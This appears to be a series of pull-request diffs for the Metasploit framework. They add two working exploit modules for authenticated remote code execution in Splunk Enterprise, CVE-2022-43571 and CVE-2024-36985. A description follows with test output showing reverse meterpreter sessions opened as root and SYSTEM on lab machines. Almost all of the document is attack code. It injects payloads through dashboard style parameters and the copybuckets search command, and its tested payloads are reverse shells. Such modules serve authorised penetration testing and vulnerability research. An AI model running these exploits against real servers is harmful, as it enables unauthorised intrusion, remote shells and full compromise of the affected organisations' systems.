+          ['URL', 'https://advisory.splunk.com/advisories/SVD-2024-0705'],
+          ['URL', 'https://web.archive.org/web/20240914000921/https://psytester.github.io/CVE-2024-36985_SPLUNK_RCE_PoC/'],
+        ],
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Splunk < 9.0.10, 9.1.5, and 9.2.2 / Unix payload',
+            {
+              # Tested with cmd/unix/reverse_bash
+              # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'Payload' => {
+          'BadChars' => '" '
+        },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-07-01',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Path to the Splunk App', '/']),
+        OptString.new('USERNAME', [ true, 'The username with admin role to authenticate as', 'admin' ]),
+        OptString.new('PASSWORD', [ true, 'The password for the specified username', 'changeme' ]),
+        OptString.new('SPLUNK_HOME', [true, 'Path to the Splunk Home Directory', '/opt/splunk/']),
+      ]
+    )
+  end
+
+  def check
+    @cookie = splunk_login(datastore['USERNAME'], datastore['password'])
+    version = splunk_home_version(@cookie)
+    if version < Rex::Version.new('9.0.10') ||
+       version.between?(Rex::Version.new('9.1.0'), Rex::Version.new('9.1.5')) ||
+       version.between?(Rex::Version.new('9.2.0'), Rex::Version.new('9.2.2'))
+
+      all_apps = get_apps(@cookie)
+      return CheckCode::Detected("Exploitable version found: #{version}, but splunk_archiver app was not found") if !all_apps.key?('splunk_archiver')
+      return CheckCode::Detected("Exploitable version found: #{version}, but splunk_archiver app is disabled") if all_apps['splunk_archiver'][:status] != 'Enabled'
+
+      return CheckCode::Appears("Exploitable version found: #{version}, splunk_archiver app is enabled")
+    end
+
+    get_apps(@cookie)
+
+    return CheckCode::Safe("Non-vulnerable version found: #{version}") if !version.nil?
+
+    return CheckCode::Unknown('Target does not appear to be a Splunk instance')
+  end
+
+  # remove duplicate slashes
+  def normalize_path(path)
+    path.gsub(%r{/+}, '/')
+  end
+
+  def get_json_payload(payload)
+    env_name = Rex::Text.rand_text_alpha_upper(8..16)
+
+    {
+      'vixes' => {},
+      providers: {
+        'providerparam' => {
+          'command.arg.1' => normalize_path("#{datastore['SPLUNK_HOME']}/etc/apps/splunk_archiver/java-bin/jars/sudobash"),
+          'command.arg.2' => "-c $#{env_name}",
+          "env.#{env_name}" => payload
+        }
+      }
+    }.to_json.to_json
+  end
+
+  def create_sudobash
+    query = '| archivebuckets forcerun=1'
+    search(@target_app, query, @cookie)
+  end
+
+  def trigger_exploit
+    json_payload = get_json_payload(payload.encoded)
+    search_query = "| copybuckets json=#{json_payload}"
+
+    search(@target_app, search_query, @cookie)
+  end
+
+  def exploit
+    if @cookie.nil?
+      @cookie = splunk_login(datastore['USERNAME'], datastore['password'])
+    end
+
+    @target_app = get_random_app(@cookie, status: 'Enabled')
+
+    create_sudobash
+    trigger_exploit
+  end
+
+end

--- a/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
+++ b/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
@@ -114,9 +114,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def trigger_exploit
     json_payload = get_json_payload(payload.encoded)
-    search_query = "| copybuckets json=#{json_payload}"
+    query = "| copybuckets json=#{json_payload}"
 
-    search(@target_app, search_query, @cookie)
+    search(@target_app, query, @cookie)
   end
 
   def exploit

--- a/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
+++ b/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'psytester', # Vulnerability Discovery
         ],
         'References' => [
-          ['CVE', 'CVE-2024-36985'],
+          ['CVE', '2024-36985'],
           ['URL', 'https://advisory.splunk.com/advisories/SVD-2024-0705'],
           ['URL', 'https://web.archive.org/web/20240914000921/https://psytester.github.io/CVE-2024-36985_SPLUNK_RCE_PoC/'],
         ],

--- a/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
+++ b/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
@@ -26,7 +26,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [
           'Maksim Rogov', # Metasploit Module
-          'psytester', # Vulnerability Discovery
+          'Alex Hordijk', # Vulnerability Discovery
+          'psytester' # Public Exploit
         ],
         'References' => [
           ['CVE', '2024-36985'],

--- a/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
+++ b/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
@@ -73,9 +73,9 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     @cookie = splunk_login(datastore['USERNAME'], datastore['password'])
     version = splunk_home_version(@cookie)
-    if version < Rex::Version.new('9.0.10') ||
-       version.between?(Rex::Version.new('9.1.0'), Rex::Version.new('9.1.5')) ||
-       version.between?(Rex::Version.new('9.2.0'), Rex::Version.new('9.2.2'))
+    if version.between?(Rex::Version.new('9.0.0'), Rex::Version.new('9.0.9')) ||
+       version.between?(Rex::Version.new('9.1.0'), Rex::Version.new('9.1.4')) ||
+       version.between?(Rex::Version.new('9.2.0'), Rex::Version.new('9.2.1'))
 
       all_apps = get_apps(@cookie)
       return CheckCode::Detected("Exploitable version found: #{version}, but splunk_archiver app was not found") if !all_apps.key?('splunk_archiver')

--- a/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
+++ b/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
@@ -64,7 +64,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME', [ true, 'The username with admin role to authenticate as', 'admin' ]),
         OptString.new('PASSWORD', [ true, 'The password for the specified username', 'changeme' ]),
         OptString.new('SPLUNK_HOME', [true, 'Path to the Splunk home directory', '/opt/splunk/']),
-        OptString.new('CREATE_SUDOBASH', [true, 'Set to false if you are sure that sudobash exists on the target system', true]),
+        OptBool.new('CREATE_SUDOBASH', [true, 'Set to false if you are sure that sudobash exists on the target system', true]),
+        OptInt.new('DELAY', [true, 'Delay in seconds to wait for sudobash to be dropped to the filesystem', 3]),
       ]
     )
   end
@@ -110,11 +111,20 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def create_sudobash
+    print_status('Sending sudobash create request...')
+
     query = '| archivebuckets forcerun=1'
     search(@target_app, query, @cookie)
+    print_good('sudobash create request has been sent!')
+
+    print_status('Sleep for 3 seconds before it is dropped on the filesystem...')
+    Rex::ThreadSafe.sleep(3)
+    print_good('Sleep Completed')
   end
 
   def trigger_exploit
+    print_status('Sending trigger exploit request...')
+
     json_payload = get_json_payload(payload.encoded)
     query = "| copybuckets json=#{json_payload}"
 

--- a/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
+++ b/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
@@ -81,8 +81,6 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Appears("Exploitable version found: #{version}, splunk_archiver app is enabled")
     end
 
-    get_apps(@cookie)
-
     return CheckCode::Safe("Non-vulnerable version found: #{version}") if !version.nil?
 
     return CheckCode::Unknown('Target does not appear to be a Splunk instance')

--- a/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
+++ b/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
@@ -94,11 +94,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def get_json_payload(payload)
     env_name = Rex::Text.rand_text_alpha_upper(8..16)
+    provider = Rex::Text.rand_text_alphanumeric(8..16)
 
     {
       'vixes' => {},
       providers: {
-        'providerparam' => {
+        provider => {
           'command.arg.1' => normalize_path("#{datastore['SPLUNK_HOME']}/etc/apps/splunk_archiver/java-bin/jars/sudobash"),
           'command.arg.2' => "-c $#{env_name}",
           "env.#{env_name}" => payload

--- a/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
+++ b/modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI', [true, 'Path to the Splunk App', '/']),
         OptString.new('USERNAME', [ true, 'The username with admin role to authenticate as', 'admin' ]),
-        OptString.new('PASSWORD', [ true, 'The password for the specified username', 'changeme' ]),
+        OptString.new('PASSWORD', [ true, 'The password for the specified username']),
         OptString.new('SPLUNK_HOME', [true, 'Path to the Splunk home directory', '/opt/splunk/']),
         OptBool.new('CREATE_SUDOBASH', [true, 'Set to false if you are sure that sudobash exists on the target system', true]),
         OptInt.new('DELAY', [true, 'Delay in seconds to wait for sudobash to be dropped to the filesystem', 3]),
@@ -71,15 +71,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    @cookie = splunk_login(datastore['USERNAME'], datastore['password'])
+    @cookie = splunk_login(datastore['USERNAME'], datastore['PASSWORD'])
     version = splunk_home_version(@cookie)
-    if version.between?(Rex::Version.new('9.0.0'), Rex::Version.new('9.0.9')) ||
+    if version <= Rex::Version.new('9.0.9') ||
        version.between?(Rex::Version.new('9.1.0'), Rex::Version.new('9.1.4')) ||
        version.between?(Rex::Version.new('9.2.0'), Rex::Version.new('9.2.1'))
 
       all_apps = get_apps(@cookie)
       return CheckCode::Detected("Exploitable version found: #{version}, but splunk_archiver app was not found") if !all_apps.key?('splunk_archiver')
-      return CheckCode::Detected("Exploitable version found: #{version}, but splunk_archiver app is disabled") if all_apps['splunk_archiver'][:status] != 'Enabled'
+      return CheckCode::Detected("Exploitable version found: #{version}, but splunk_archiver app is disabled") if all_apps['splunk_archiver'][:enabled] == false
 
       return CheckCode::Appears("Exploitable version found: #{version}, splunk_archiver app is enabled")
     end
@@ -98,6 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
     env_name = Rex::Text.rand_text_alpha_upper(8..16)
     provider = Rex::Text.rand_text_alphanumeric(8..16)
 
+    # The payload is double-escaped because the entire JSON object must be passed as a literal string value inside the json="..." splunk query.
     {
       'vixes' => {},
       providers: {
@@ -118,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good('sudobash create request has been sent!')
 
     print_status('Sleep for 3 seconds before it is dropped on the filesystem...')
-    Rex::ThreadSafe.sleep(3)
+    Rex::ThreadSafe.sleep(datastore['DELAY'])
     print_good('Sleep Completed')
   end
 
@@ -133,10 +134,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     if @cookie.nil?
-      @cookie = splunk_login(datastore['USERNAME'], datastore['password'])
+      @cookie = splunk_login(datastore['USERNAME'], datastore['PASSWORD'])
     end
 
-    @target_app = get_random_app(@cookie, status: 'Enabled')
+    @target_app = get_random_app(@cookie, enabled: true)
 
     if datastore['CREATE_SUDOBASH'] == true
       create_sudobash

--- a/modules/exploits/multi/http/splunk_auth_rce_cve_2022_43571.rb
+++ b/modules/exploits/multi/http/splunk_auth_rce_cve_2022_43571.rb
@@ -131,9 +131,9 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     @cookie = splunk_login(datastore['USERNAME'], datastore['password'])
     version = splunk_home_version(@cookie)
-    if version < Rex::Version.new('8.1.12') ||
-       version.between?(Rex::Version.new('8.2.0'), Rex::Version.new('8.2.9')) ||
-       version.between?(Rex::Version.new('9.0.0'), Rex::Version.new('9.0.2'))
+    if version.between?(Rex::Version.new('8.1.0'), Rex::Version.new('8.1.11')) ||
+       version.between?(Rex::Version.new('8.2.0'), Rex::Version.new('8.2.8')) ||
+       version.between?(Rex::Version.new('9.0.0'), Rex::Version.new('9.0.1'))
       return CheckCode::Appears("Exploitable version found: #{version}")
     end
 

--- a/modules/exploits/multi/http/splunk_auth_rce_cve_2022_43571.rb
+++ b/modules/exploits/multi/http/splunk_auth_rce_cve_2022_43571.rb
@@ -26,7 +26,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [
           'Maksim Rogov', # Metasploit Module
-          'Lachlan Davidson', # Vulnerability Discovery
+          'Danylo Dmytriiev', # Vulnerability Discovery
+          'psytester' # Public Exploit
         ],
         'References' => [
           ['CVE', '2022-43571'],

--- a/modules/exploits/multi/http/splunk_auth_rce_cve_2022_43571.rb
+++ b/modules/exploits/multi/http/splunk_auth_rce_cve_2022_43571.rb
@@ -1,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Splunk
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Authenticated RCE in Splunk (SimpleXML dashboard PDF generation)',
+        'Description' => %q{
+          This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise.
+
+          An attacker can inject arbitrary Python code into style parameters, such as the fillColor or lineColor of a sparkline element within a Splunk SimpleXML dashboard.
+          The malicious code is executed when a user triggers the PDF export function for the dashboard.
+
+          The affected versions include any release prior to 8.1.12, as well as versions 8.2.0 through 8.2.9 and 9.0.0 through 9.0.2.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Maksim Rogov', # Metasploit Module
+          'Lachlan Davidson', # Vulnerability Discovery
+        ],
+        'References' => [
+          ['CVE', '2022-43571'],
+          ['URL', 'https://advisory.splunk.com/advisories/SVD-2022-1111'],
+          ['URL', 'https://web.archive.org/web/20221218233608/https://psytester.github.io/CVE-2022-43571_SPLUNK_RCE/']
+        ],
+        'Platform' => ['python'],
+        'Arch' => [ARCH_PYTHON],
+        'Targets' => [
+          [
+            'Splunk < 8.1.12, 8.2.9, and 9.0.2 / Python payload',
+            {
+              # Tested with python/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2022-11-02',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Path to the Splunk App', '/']),
+        OptString.new('USERNAME', [ true, 'The username with admin role to authenticate as', 'admin' ]),
+        OptString.new('PASSWORD', [ true, 'The password for the specified username', 'changeme' ])
+      ]
+    )
+  end
+
+  def get_malicious_dashboard_template(payload)
+    rand_tail = rand(100..200)
+    escaped_payload = CGI.escapeHTML(payload)
+    style_param = ['lineColor', 'fillColor'].sample
+
+    dash_template = <<~XSL
+      <dashboard>
+          <row>
+              <panel>
+                  <table>
+                      <search>
+                      <query>
+                          index=_internal | tail #{rand_tail} | chart sparkline count by sourcetype
+                      </query>
+                      </search>
+                      <format field="sparkline" type="sparkline">
+                      <option name="#{style_param}">#{escaped_payload}</option>
+                      </format>
+                  </table>
+              </panel>
+          </row>
+      </dashboard>
+    XSL
+
+    # delete spaces
+    dash_template.gsub(/^\s+/, '')
+  end
+
+  def cleanup
+    delete_dashboard(@target_app, @dash_name, @cookie)
+  rescue StandardError
+    nil
+  end
+
+  def check
+    @cookie = splunk_login(datastore['USERNAME'], datastore['password'])
+    version = splunk_home_version(@cookie)
+    if version < Rex::Version.new('8.1.12') ||
+       version.between?(Rex::Version.new('8.2.0'), Rex::Version.new('8.2.9')) ||
+       version.between?(Rex::Version.new('9.0.0'), Rex::Version.new('9.0.2'))
+      return CheckCode::Appears("Exploitable version found: #{version}")
+    end
+
+    return CheckCode::Safe("Non-vulnerable version found: #{version}") if !version.nil?
+
+    return CheckCode::Unknown('Target does not appear to be a Splunk instance')
+  end
+
+  def exploit
+    if @cookie.nil?
+      @cookie = splunk_login(datastore['USERNAME'], datastore['password'])
+    end
+
+    template = get_malicious_dashboard_template(payload.encoded)
+
+    @target_app = get_random_app(@cookie, status: 'Enabled')
+    @dash_name = Rex::Text.rand_text_alphanumeric(8..16)
+
+    create_dashboard(@target_app, @dash_name, template, @cookie)
+    begin
+      export_dashboard(@target_app, @dash_name, @cookie)
+    rescue StandardError
+      nil
+    end
+  end
+
+end

--- a/modules/exploits/multi/http/splunk_auth_rce_cve_2022_43571.rb
+++ b/modules/exploits/multi/http/splunk_auth_rce_cve_2022_43571.rb
@@ -58,15 +58,46 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI', [true, 'Path to the Splunk App', '/']),
         OptString.new('USERNAME', [ true, 'The username with admin role to authenticate as', 'admin' ]),
-        OptString.new('PASSWORD', [ true, 'The password for the specified username', 'changeme' ])
+        OptString.new('PASSWORD', [ true, 'The password for the specified username', 'changeme' ]),
+        OptBool.new('USE_INLINE_SPLUNK_QUERY', [true, 'By default, the exploit uses a simple query using system indexes (such as _internal). This option can be useful if those indexes are empty', false ])
       ]
     )
   end
 
-  def get_malicious_dashboard_template(payload)
+  def gen_inline_splunk_query
+    row_id_name = Rex::Text.rand_text_alphanumeric(8..16)
+    arr_field = Rex::Text.rand_text_alpha(8..16)
+
+    rand_count = rand(100..500)
+    step = rand(2..15)
+
+    col_count = rand(3..10)
+    column_names = col_count.times.map { Rex::Text.rand_text_alphanumeric(8..16) }
+
+    delimiter = [';', '|', ':', '#', '!'].sample
+    names_string = column_names.join(delimiter)
+
+    <<~SPL.strip
+      | makeresults count=#{rand_count}
+      | streamstats count as #{row_id_name}
+      | eval _time = now() - (#{row_id_name} * #{step}),
+             #{arr_field} = split("#{names_string}", "#{delimiter}"),
+             sourcetype = mvindex(#{arr_field}, #{row_id_name} % #{col_count})
+      | chart sparkline count by sourcetype
+    SPL
+  end
+
+  def get_system_index_splunk_query
     rand_tail = rand(100..200)
-    escaped_payload = CGI.escapeHTML(payload)
+    index = ['_internal', '_audit', '_introspection'].sample
+
+    "index=#{index} | tail #{rand_tail} | chart sparkline count by sourcetype"
+  end
+
+  def get_malicious_dashboard_template(payload)
+    splunk_query = datastore['USE_INLINE_SPLUNK_QUERY'] ? gen_inline_splunk_query : get_system_index_splunk_query
     style_param = ['lineColor', 'fillColor'].sample
+    escaped_payload = CGI.escapeHTML(payload)
 
     dash_template = <<~XSL
       <dashboard>
@@ -75,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
                   <table>
                       <search>
                       <query>
-                          index=_internal | tail #{rand_tail} | chart sparkline count by sourcetype
+                          #{splunk_query}
                       </query>
                       </search>
                       <format field="sparkline" type="sparkline">

--- a/modules/exploits/multi/http/splunk_auth_rce_cve_2022_43571.rb
+++ b/modules/exploits/multi/http/splunk_auth_rce_cve_2022_43571.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI', [true, 'Path to the Splunk App', '/']),
         OptString.new('USERNAME', [ true, 'The username with admin role to authenticate as', 'admin' ]),
-        OptString.new('PASSWORD', [ true, 'The password for the specified username', 'changeme' ]),
+        OptString.new('PASSWORD', [ true, 'The password for the specified username']),
         OptBool.new('USE_INLINE_SPLUNK_QUERY', [true, 'By default, the exploit uses a simple query using system indexes (such as _internal). This option can be useful if those indexes are empty', false ])
       ]
     )
@@ -123,13 +123,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def cleanup
+    super
     delete_dashboard(@target_app, @dash_name, @cookie)
-  rescue StandardError
-    nil
+  rescue Msf::Exploit::Failed
+    print_warning("Module failed to delete the dashboard, \"#{@dash_name}\", which was created by the exploit")
   end
 
   def check
-    @cookie = splunk_login(datastore['USERNAME'], datastore['password'])
+    @cookie = splunk_login(datastore['USERNAME'], datastore['PASSWORD'])
     version = splunk_home_version(@cookie)
     if version.between?(Rex::Version.new('8.1.0'), Rex::Version.new('8.1.11')) ||
        version.between?(Rex::Version.new('8.2.0'), Rex::Version.new('8.2.8')) ||
@@ -144,12 +145,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     if @cookie.nil?
-      @cookie = splunk_login(datastore['USERNAME'], datastore['password'])
+      @cookie = splunk_login(datastore['USERNAME'], datastore['PASSWORD'])
     end
 
     template = get_malicious_dashboard_template(payload.encoded)
 
-    @target_app = get_random_app(@cookie, status: 'Enabled')
+    @target_app = get_random_app(@cookie, enabled: true)
     @dash_name = Rex::Text.rand_text_alphanumeric(8..16)
 
     create_dashboard(@target_app, @dash_name, template, @cookie)


### PR DESCRIPTION
# CVE-2022-43571

## Vulnerability Details

This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise.

An attacker can inject arbitrary Python code into style parameters, such as the `fillColor` or `lineColor` of a sparkline element within a Splunk SimpleXML dashboard. 
The malicious code is executed when a user triggers the PDF export function for the dashboard.

The affected versions include any release prior to 8.1.12, as well as versions 8.2.0 through 8.2.9 and 9.0.0 through 9.0.2.

## Module Information

Module path: `modules/exploits/multi/http/splunk_auth_rce_cve_2022_43571.rb`
Platform: `Linux/Unix/Windows`

## References

- https://advisory.splunk.com/advisories/SVD-2022-1111
- https://web.archive.org/web/20221218233608/https://psytester.github.io/CVE-2022-43571_SPLUNK_RCE/

## Test Output

### Linux
```
msf6 > use multi/http/splunk_auth_rce_cve_2022
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set RHOSTS 192.168.19.139
RHOSTS => 192.168.19.139
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set RPORT 8000
RPORT => 8000
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set PASSWORD password123
PASSWORD => password123
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > run

[*] Started reverse TCP handler on 192.168.19.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] SUCCESSFUL LOGIN. 'admin' : 'password123'
[+] The target appears to be vulnerable. Exploitable version found: 8.2.4
[*] Sending stage (24772 bytes) to 192.168.19.139
[*] Meterpreter session 2 opened (192.168.19.130:4444 -> 192.168.19.139:59524) at 2025-12-12 15:11:44 -0500

meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.4.0-150-generic #167~18.04.1-Ubuntu SMP Wed May 24 00:51:42 UTC 2023
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: root
```

### Windows

```
msf6 > use multi/http/splunk_auth_rce_cve_2022_43571
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set RHOSTS 192.168.19.137
RHOSTS => 192.168.19.137
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set RPORT 8000
RPORT => 8000
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set PASSWORD password123
PASSWORD => password123
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > run

[*] Started reverse TCP handler on 192.168.19.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] SUCCESSFUL LOGIN. 'admin' : 'password123'
[+] The target appears to be vulnerable. Exploitable version found: 8.2.6
[*] Sending stage (24772 bytes) to 192.168.19.137
[*] Meterpreter session 3 opened (192.168.19.130:4444 -> 192.168.19.137:62128) at 2025-12-12 15:21:53 -0500

meterpreter > sysinfo
Computer        : DESKTOP-vognik
OS              : Windows 10 (Build 19044)
Architecture    : x64
System Language : en_US
Meterpreter     : python/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

------------

# CVE-2024-36985

## Vulnerability Details

This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise (splunk_archiver application).

The flaw is rooted in the unsafe use of a Splunk lookup function, specifically `| copybuckets`, within the splunk_archiver application, which ultimately leads to the execution of the helper script sudobash with attacker-controlled arguments.

The affected versions include any release prior to 9.0.10, as well as versions 9.1.2 through 9.1.5 and 9.2.0 through 9.2.2.

## Module Information

Module path: `modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb`
Platform: `Linux/Unix`

## References

- https://advisory.splunk.com/advisories/SVD-2024-0705
- https://web.archive.org/web/20240914000921/https://psytester.github.io/CVE-2024-36985_SPLUNK_RCE_PoC/

## Test Output
```
msf6 > use linux/http/splunk_auth_rce_cve_2024_36985
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > set RHOSTS 192.168.19.139
RHOSTS => 192.168.19.139
msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > set RPORT 8000
RPORT => 8000
msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > set FETCH_SRVPORT 8090
FETCH_SRVPORT => 8090
msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > set PASSWORD password123
PASSWORD => password123
msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > run

[*] Started reverse TCP handler on 192.168.19.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] SUCCESSFUL LOGIN. 'admin' : 'password123'
[+] The target appears to be vulnerable. Exploitable version found: 8.2.4, splunk_archiver app is enabled
[*] Sending stage (3045380 bytes) to 192.168.19.139
[*] Meterpreter session 1 opened (192.168.19.130:4444 -> 192.168.19.139:55936) at 2025-12-12 15:04:44 -0500

meterpreter > sysinfo
Computer     : 192.168.19.139
OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
```